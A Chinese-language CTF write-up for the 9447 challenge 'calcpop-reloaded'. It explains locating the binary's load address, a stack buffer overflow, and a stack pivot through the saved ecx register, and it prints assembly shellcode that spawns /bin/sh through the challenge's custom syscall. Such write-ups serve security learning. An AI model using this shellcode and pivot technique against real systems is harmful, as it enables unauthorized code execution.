Writeup-9447 CTF: calcpop-reloaded

从这一题开始,9447 加上了 POW, 其实只要爆破就可以,这里就不放脚本了。(关于 POW, 有个叫 hashcash 的东西,挺有意思的)

这道题我没有在比赛期间做出来。当时完全没有逆向 load address 未知的二进制的经验,什么都干不了。后来简单看了别人的 writeup,在只知道逆向方法的情况下重新做出了这题。前后大概还是花了七八小时(我好渣…),硬着头皮写篇 writeup 记录一下。

Load Address

找 load address 的过程大概是先用 radare 打开,然后翻反汇编代码,可以找到mov eax, 0x1007a7这类代码,大概可以猜出 load address 在 0x100000.

用 IDA 打开,填好 load offset, 开始调试。可以猜出 main 函数(?)的位置大概在 0x1008bc.

Overflow

接下来找溢出点。可以看到 0x001008EE 处调用了输入函数,分配栈空间是 0x98, 但是传递了一个大概是 size 的参数,值为 0x100. 存在溢出。

这题和 calcpop 有一点不同的是,calcpop 中输入 exit 会直接退出 main 函数,这题输入 exit 会调用shutdown()之类的函数,没细看,效果就是不会再有输出了。这道题退出 main 函数的方法是,正确输入,让计算结果为 201527, 程序会输出彩蛋信息,然后退出 main 函数。

接下来就是怎么溢出了,先看 main 函数入口和出口处的栈变化:

; entry:
lea     ecx, [esp-4]
and     esp, 0FFFFFFF0h
push    dword ptr [ecx-4]
push    ebp
mov     ebp, esp
push    edi
push    esi
push    ebx
push    ecx

; exit:
lea     esp, [ebp-10h]
xor     eax, eax
pop     ecx
pop     ebx
pop     esi
pop     edi
pop     ebp
lea     esp, [ecx-4]
retn

溢出到保存 ecx 的位置,使 ecx - 4 指向存有 shellcode 地址的栈位置,然后 ret 就能跳转到 shellcode.

Shellcode

这题怎么写 shellcode 也是一个难点,因为系统是 9447 写的,不能直接用 execv 系统调用。所幸的是本题的系统调用功能都是能从一些字符串上看出来的。比如read(%d %x %d), write(%d %x %d)之类。strings 一下可以看到spawn(%x %x %d),我就猜测这个是类似 execv 的系统调用。可是参数不明确,特别是第三个参数。试了几次,发现用spawn("/bin/sh", "/bin/sh", 1)这样的参数是可以成功的,第三个参数 1 具体是什么含义,我也没搞明白。

用 pwntool 生成的 shellcode 如下:

; push '/bin/sh\x00'
push 0x1010101
xor dword ptr [esp], 0x169722e
push 0x6e69622f
mov edi, esp

push 0x1
push edi
push edi
push 0xdeadbeef  ; junk
mov ebx, 302125832
xor ebx, 0x12121212
call ebx  ; spawn(%x, %x, %d)

exp.py

可以用 redos 中的 level1 本地调试。

Creative Commons License